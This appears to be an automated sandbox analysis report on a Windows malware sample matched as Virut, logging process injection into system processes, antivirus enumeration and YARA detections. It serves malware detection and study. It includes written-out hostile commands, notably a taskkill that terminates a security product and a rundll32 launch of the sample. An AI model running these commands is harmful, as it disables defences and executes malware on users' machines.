Source: C:\Windows\SysWOW64\zvhcfa.exe	Section loaded: \BaseNamedObjects\imktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Section loaded: \BaseNamedObjects\imktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Section loaded: \BaseNamedObjects\imktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542FE0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542DC0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77543620	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542F60	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77543710	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542C00	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542FE0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542DC0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77543620	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542F60	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77543710	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542C00	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C1C3730000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C1C3740000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C1C3740000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C1C3740000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C1C3740000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C1C3740000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C1C3740000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C1C3740000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C1C3740000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C1C3740000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C1C3740000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C1C3740000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DC09DB0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DC09DB0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DC09DB0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DC09DB0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DC09DB0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DC09DB0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DC09DB0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DC09DB0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DC09DB0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DC09DB0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DC09DB0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 13A223A0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4140000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4140000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4140000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4140000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4140000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4140000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4140000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4140000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4140000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4140000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C1C37B0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5610000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5610000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5610000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5610000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5610000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5610000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5610000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5610000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5610000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5610000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 56E0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 56E0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 56E0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 56E0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 56E0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 56E0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 56E0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 56E0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 56E0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 56E0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5CE0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5CE0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5CE0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5CE0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5CE0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5CE0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5CE0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5CE0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5CE0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5CE0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\dwm.exe base: 283E1090000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542FE0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542DC0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77543620	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542F60	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77543710	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542C00	Jump to behavior
Source: C:\Windows\SysWOW64\zvhcfa.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542FE0
Source: C:\Windows\SysWOW64\zvhcfa.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542DC0
Source: C:\Windows\SysWOW64\zvhcfa.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77543620
Source: C:\Windows\SysWOW64\zvhcfa.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542F60
Source: C:\Windows\SysWOW64\zvhcfa.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77543710
Source: C:\Windows\SysWOW64\zvhcfa.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542C00

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\26B1sczZ88.dll",#1

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im ZhuDongFangYu.exe /t

Jump to behavior

Source: winlogon.exe, 00000008.00000000.1492871688.000001F386111000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.2772962986.000001F386111000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000F.00000000.1511520472.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: winlogon.exe, 00000008.00000000.1492871688.000001F386111000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.2772962986.000001F386111000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000F.00000000.1511520472.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000008.00000000.1492871688.000001F386111000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.2772962986.000001F386111000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000F.00000000.1511520472.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: winlogon.exe, 00000008.00000000.1492871688.000001F386111000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.2772962986.000001F386111000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000F.00000000.1511520472.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: dwm.exe, 0000000F.00000002.2803042199.00000283DB78C000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000000F.00000000.1510253959.00000283DB78C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerS

Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: LoadLibraryA,GetProcAddress,GetLocaleInfoW,GetComputerNameA,lstrcpyA,lstrcpyA,strstr,strstr,strstr,strstr,strstr,strstr,strstr,lstrcpyA,lstrcpyA,GlobalMemoryStatusEx,lstrcpyA,GetTickCount,	6_2_00402F70
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: LoadLibraryA,GetProcAddress,GetLocaleInfoW,GetComputerNameA,lstrcpyA,lstrcpyA,strstr,strstr,strstr,strstr,strstr,strstr,strstr,lstrcpyA,lstrcpyA,GlobalMemoryStatusEx,lstrcpyA,GetTickCount,	7_2_00402F70
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: LoadLibraryA,GetProcAddress,GetLocaleInfoW,GetComputerNameA,lstrcpyA,lstrcpyA,strstr,strstr,strstr,strstr,strstr,strstr,strstr,lstrcpyA,lstrcpyA,GlobalMemoryStatusEx,lstrcpyA,GetTickCount,	21_2_00402F70
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	Code function: LoadLibraryA,GetProcAddress,GetLocaleInfoW,GetComputerNameA,lstrcpyA,lstrcpyA,RegOpenKeyExA,strstr,strstr,strstr,strstr,strstr,strstr,strstr,lstrcpyA,lstrcpyA,RegOpenKeyExA,wsprintfA,wsprintfA,GlobalMemoryStatusEx,wsprintfA,lstrcpyA,GetTickCount,	30_2_00402F70

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp

Code function: 6_2_0047984F GetSystemTime,Sleep,Sleep,

6_2_0047984F

Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp

Code function: 6_2_004763EE GetModuleHandleA,GetVersion,VirtualAlloc,CloseHandle,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,

6_2_004763EE

Source: Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.25.dr

Binary or memory string: MsMpEng.exe

Source: C:\Windows\SysWOW64\rundll32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected Virut

Source: Yara match	File source: 21.2.hrlA367.tmp.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.hrl97BF.tmp.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000002.2743535164.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2741797049.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2743367209.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2743542686.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2798846486.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2742331815.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2744487406.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2743363395.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2743906496.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.1516357060.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2742839099.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2744241055.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2741751352.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2743908241.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2017093698.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.1519926327.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2798955144.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2742966295.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2742677643.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.2745114770.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2742603638.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2743903996.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2043911687.000000007FE20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2743612981.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2744408295.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2743736063.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000000.1537557780.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2017013687.000000007FE20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.1514452533.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2743037216.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2742840917.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2798456887.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2743087540.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.1550287003.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.1512389471.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2742759300.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.1498055145.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2741922410.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.2741956104.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2065117221.0000000000422000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.1491890758.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2741930750.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.1509606581.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2743461282.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2742552059.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.1522184005.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2741922176.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.1495302635.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.1542306261.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2742576822.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2798241222.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.1496798093.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2742703107.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2742760458.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2742198516.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2744126681.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.1572545222.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2066888535.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.2743852596.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2743091000.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.1509586132.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2742914219.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2741867843.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2043996617.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.1491843448.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2798238281.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2798310722.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2744224357.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2741748612.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2742335064.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.2742967559.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.1525893859.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2742301520.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2742837753.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2742525977.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2743537432.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2742450602.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2741745861.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.1564612279.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2742498334.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hrl97BF.tmp PID: 5732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hrl97AF.tmp PID: 3388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: winlogon.exe PID: 584, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lsass.exe PID: 640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fontdrvhost.exe PID: 776, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fontdrvhost.exe PID: 784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 880, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 928, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dwm.exe PID: 992, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 792, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1028, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hrlA367.tmp PID: 3916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1336, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1392, type: MEMORYSTR
